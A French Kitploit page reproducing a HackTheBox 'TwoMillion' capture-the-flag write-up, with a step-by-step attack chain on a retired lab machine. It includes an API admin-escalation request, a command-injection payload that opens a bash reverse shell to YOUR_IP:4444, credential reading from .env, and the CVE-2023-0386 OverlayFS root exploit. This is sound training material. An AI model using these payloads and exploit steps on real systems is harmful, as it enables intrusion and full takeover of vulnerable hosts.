Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
HTB-TwoMillion-Writeup — Write-up de la machine HackTheBox TwoMillion — abus d'API, injection de commandes et CVE-2023-0386 | Kitploit
Outils/GitHubGitHub/karimelsheikh1/htb-twomillion-writeup
Escalade de PrivilègesReconnaissanceAnalyse des VulnérabilitésExploitationMouvement LatéralExploitation d'Applications WebPost-ExploitationCTFTests d'Intrusion

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Commandement et Contrôle
Apprentissage et Éducation
GitHubkarimelsheikh1/htb-twomillion-writeup

HTB-TwoMillion-Writeup

Write-up de la machine HackTheBox TwoMillion — abus d'API, injection de commandes et CVE-2023-0386

Voir le dépôt
il y a 3 moisPas encore vérifié

Compte-rendu HTB-TwoMillion

Compte-rendu de la machine TwoMillion sur HackTheBox — Abus API, injection de commande & CVE-2023-0386

HackTheBox — Compte-rendu TwoMillion

HackTheBox — Compte-rendu TwoMillion

HTB Difficulty OS

Informations sur la machine

ChampDétails
NomTwoMillion
DifficultéFacile
OSLinux
IP10.10.11.221
CVECVE-2023-0386

Résumé

TwoMillion est une machine Linux facile centrée sur l'ancienne plateforme HackTheBox. Elle implique le décodage d'un code d'invitation, l'abus de points d'API, une injection de commande OS, la découverte d'identifiants et une élévation de privilèges du noyau Linux via CVE-2023-0386 (OverlayFS).


Énumération

Nmap

root@kitploit:~
nmap -sV -sC -v 10.10.11.221

Ports ouverts :

  • 22 — OpenSSH 8.9p1
  • 80 — HTTP nginx → redirige vers 2million.htb

Ajouter à /etc/hosts :

root@kitploit:~
echo "10.10.11.221 2million.htb" >> /etc/hosts

Étape 1 — Code d'invitation

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/how/to/generate

La réponse est encodée en ROT13. Décodez-la :

root@kitploit:~
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'

Générer le code d'invitation :

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d

Inscrivez-vous sur http://2million.htb/register en utilisant le code d'invitation décodé.


Étape 2 — Abus API → Admin

Connectez-vous via le navigateur, récupérez PHPSESSID depuis les cookies (F12 → Application → Cookies).

Élevez vos privilèges à admin :

root@kitploit:~
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"email":"[email protected]","is_admin":1}'

Vérifiez :

root@kitploit:~
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}

Étape 3 — Injection de commande → Shell inversé

Démarrer le listener :

root@kitploit:~
nc -lvnp 4444

Envoyer la charge utile du shell inversé :

root@kitploit:~
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'

Shell obtenu en tant que www-data.


Étape 4 — Drapeau utilisateur

Trouver les identifiants dans .env :

root@kitploit:~
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123

Connectez-vous en SSH :

root@kitploit:~
ssh [email protected]
cat ~/user.txt

Étape 5 — Drapeau root (CVE-2023-0386)

Vérifiez l'indice :

root@kitploit:~
cat /var/mail/admin
uname -r
# 5.15.70 — vulnérable à CVE-2023-0386

Téléchargez et compilez l'exploit sur Kali :

root@kitploit:~
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all

Transférez sur la cible :

root@kitploit:~
# Kali
python3 -m http.server 8000

# Cible
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all

Exécutez dans deux terminaux sur la cible :

Terminal 1 :

root@kitploit:~
./fuse ./ovlcap/lower ./gc

Terminal 2 :

root@kitploit:~
./exp

Récupérez le drapeau root :

root@kitploit:~
cat /root/root.txt

Chaîne d'attaque


Outils utilisés

  • Nmap
  • curl
  • Netcat
  • CVE-2023-0386 PoC

Ce compte-rendu est à but éducatif uniquement sur une machine HackTheBox retirée.

Télécharger l’outil
ÉtapeTechnique
ReconnaissanceScan Nmap
Code d'invitationDécode ROT13 + Base64
Escalade de privilèges WebManipulation d'API → admin
Shell initialInjection de commande OS
Mouvement latéralIdentifiants .env → SSH
RootExploit CVE-2023-0386 OverlayFS